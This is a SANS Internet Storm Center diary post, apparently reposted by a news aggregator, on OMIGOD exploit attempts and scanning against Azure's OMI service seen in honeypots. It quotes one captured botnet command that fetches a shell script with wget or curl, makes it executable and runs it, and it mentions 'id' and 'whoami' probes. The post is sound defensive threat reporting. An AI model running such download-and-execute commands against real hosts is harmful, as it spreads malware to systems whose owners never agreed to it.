[SANS ISC] #OMIGOD Exploits Captured in the Wild. Researchers responsible for half of scans for related ports., (Mon, Sep 20th)

After the “OMIGOD” vulnerability details were made public, and it became obvious that exploiting vulnerable hosts would be trivial, researchers and attackers started pretty much immediately to scan for vulnerable hosts. We saw a quick rise of scans, particularly against %%port:1270%%. [1]

Some of the attacks originated from research projects that apparently enumerated vulnerable hosts. Scans we have linked to researchers appear so far to scan for the open port and do not send any specific attack payload. But we also see “genuine” exploits of the vulnerability. Azure is probably the most target-rich environment, with more than half of all hosts running Linux. Many of them have the Open Management Interface (OMI) software pre-installed by default. Azure is also leaving it up to the users to patch this software that they may not know is installed. Our data comes from our honeypot network, which is not specifically covering Azure so far. The OMI software may also be installed outside of Azure. It makes sense for attackers to scan the entire internet as hosts outside of Azure may not consider themselves vulnerable.

One exploit that just hit our honeypot (formatted for easier readability)

At this point, all of the exploits we have seen appear to test the vulnerability and do not (yet?) deploy any actual payloads. Others have observed some “Mirai” style payloads being deployed.

Here are the most common commands we see executed (sometimes, the command is Base64 encoded):

wget -O lolol.sh; curl -o lolol.sh; chmod 777 lolol.sh; sh lolol.sh

This is a typical botnet propagation command. At the time I looked for it, the lolol.sh script was no longer available, and the URL returned a 404 error.


I have seen the same command against the other ports associated with “OMI,” using different ‘test’ URLs. The URL is not reachable. Note how the IP is the same as above.

In addition, I have seen some simple requests using “id” or “whoami,” typical checks if the vulnerability is exploitable.

Interestingly, I have seen only one IP in our honeypots for the ‘wget’ or ‘curl’ commands, but the requests originated from 125 different source IPs just today alone. This appears to be one botnet, and I guess that right now, they are just looking for vulnerable systems (hitting the above URL would prove you to be vulnerable). 

As far as scans against related ports (%%port:1270%%, %%port:5986%%, %%port:5987%%), below is a graph of the targets seeing scans on these ports:


It is interesting how the scans slowly increased in September before the vulnerability was announced, and something that needs a bit more time to look into.

Almost exactly half of the scans to these ports come from researchers. The “Strechoid” network appears to be most active, but others like Shodan, Internet Census, Onyphe, Cyber.casa, Internettl and so on are participating. Not all of these are typically publishing results, but for those that do expect a lot of identical papers/news releases soon with headlines like “1000’s of exposed hosts found vulnerable to OMIGOD” (if they didn’t find much) or “10s of 1000s of exposed hosts found vulnerable to OMIGOD” (if they found more).

So far, there is a lot of recon happening. But this is a MUST PATCH NOW vulnerability, and if you are finding an exposed host inside Azure running OMI, assume compromise.

[1] https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

[SecurityWeek] Trend Micro Patches Critical Vulnerability in Server Protection Solution

All posts, Security Week

Trend Micro has released patches for a critical authentication bypass vulnerability in Trend Micro ServerProtect. Tracked as CVE-2021-36745 and featuring a CVSS score of 9.8, the security hole could be exploited by remote attackers to completely bypass authentication on a vulnerable system. read more Source: Read More (SecurityWeek RSS Feed)

Read More

[ZDNet] Australian government looks to make Essential Eight essential

All posts, ZDNet

The not-so-essential Essential Eight might soon become essential for Australian government entities, the Attorney-General’s Department has signalled. Source: Read More (Latest topics for ZDNet in Security)

Read More

[SecurityWeek] Several Companies Join Forces for New OT Cybersecurity Coalition

All posts, Security Week

Several companies have joined forces to launch the Operational Technology Cybersecurity Coalition, which claims its goal is to help strengthen the defenses of industrial control systems (ICS) and critical infrastructure in the United States. read more Source: Read More (SecurityWeek RSS Feed)

Read More

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.